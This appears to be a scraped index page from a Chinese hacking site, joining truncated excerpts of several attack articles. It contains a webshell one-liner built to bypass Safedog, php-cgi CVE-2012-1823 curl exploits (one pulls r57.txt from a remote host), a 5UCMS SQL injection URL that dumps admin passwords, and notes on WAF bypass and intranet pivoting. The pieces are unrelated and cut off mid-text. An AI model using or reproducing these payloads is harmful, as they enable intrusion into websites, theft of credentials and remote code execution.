PHP 5.4 (5.4.3) Code Execution (Win32)
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)
===================
offset-brut[......]
渗透内网方法之巧用代理
代理在入侵里的作用—–妙用代理,渗透内网
一、踩点
主机: http://www.webshell.cc
OS:Windows 2000 + IIS 5.0 + MSSQL
端口:80 21i
数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.
首页存在注入漏洞,sa登陆.
注入点:
http://www.webshell.cc/list.asp?id=1
二、入侵思路
1.给内网目标机装个代理服务器
2.把弄好的那个代理端口映到公网.
3[......]
如何绕过D盾进行注入
少壮不努力,长大遇啊D
—-某大黑客
D盾有多不爽我就不说了,现在都是批量注入,时不时的弹出D盾提示,甚是恼人。。。。。
其实这个并不是我发现的,而是国外的一个注入工具。某日本人心血来潮,想换一个linux系统玩玩儿,在互联网上逛了一大圈,发现大半都是带马的网站,甚是不爽,准备关闭、突然一个字眼吸引了我,没错,那就是Anonymous_os,看了下简介说是匿名者做的一个linux内核的操作系统,重点是还附带了32个注入工具,于是我等菜鸟冲着匿名者的大名安装了此系统(注意:不懂英文的同学千万要拿着一本词典进行安装,不然引导扇区被删了可别怪我)
于是我就开始测试,首先切[......]
获取使用CDN网站的真实IP
现在很多网站用了cdn技术,在做一些测试的时候,想获取其服务器真实IP地址就有点困难,不知道现在还有其他什么好的方法呢,整理了下,目前知道如下两种:
1:拿CDN服务器 找出真实IP
cache_peer 1.1.1.1 parent 80 0 no-query originserver
cache_peer_domain 1.1.1.1 www.xxxx.com
2:判断HTTP_X_FORWARDED_FOR是否为空,不为空把这个作为IP地址,否则取得REMOTE_ADDR作为IP地址。
如果服务器可以上传文件,可上传文件加如下代码:
Request.S[......]
可突破安全狗的aspx一句话
在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功。
服务端一句话木马:
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstan[......]
php-cgi漏洞利用EXP
1、本地包含直接执行代码:
curl -H "USER-AGENT: <?system('id');die();?>" http://www.webshell.cc/test.php?-dauto_prepend_file%3d/proc/self/environ+-n
2、远程包含执行代码:
curl http://www.webshell.cc/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.webshell.cc/r57.txt
[......]
无忧无忧网络文章管理系统(5UCMS)注入漏洞
后台地址:admin/Login.asp
数据库路径:inc/db 目录下
漏洞地址:admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_[......]
Discuz NT 多个版本文件上传漏洞
文章作者:rebeyond
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。
受影响版本:貌似都受影响。
漏洞文件:tools/ajax.aspx
漏洞分析:这个页面里的ajax请求,都没有进行权限的验证,游客权限就可以调用其中的所有方法,很危险的写法,于是有了下面的漏洞。
当filename和upload两个参数同时不为空时,取得input的值,并解密生成uid,然后调用UploadTempAvat[......]
CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。
另外关于RCE的PoC原文没有给出,不过说明的确可以远程执行代码。那么他是怎么做到的呢?我粗略想了想,可以利用的参数只有一个-d参数了,作用是给php定义一个ini的值。
那么利用它能做什么呢?我给[......]
最新的PHP补丁并不能修复漏洞
星期三, 一個 PHP 远程代码执行漏洞被意外公开在网上, 引发了利用此漏洞可对大量网站实施入侵的恐慌. 该 bug 可以追溯到 2004 年, 在最近的 CTF 比赛中被暴露. ‘当 PHP 以 CGI 模式运行时 (如 Apache 的 mod_cgid), php-cgi 会接受处理一個查询字符串作为命令行参数以开启某些功能
如 -s, -d 或 -c 传递给 php-cgi, 此处存在的漏洞可以允许攻击者查看源码或进行任意代码执行’ CERT 说. PHP 开发者向 PHP 5.3.12 和 5.4.2 发布了补丁, 但很快被发现补丁并未能真的修补该漏洞.
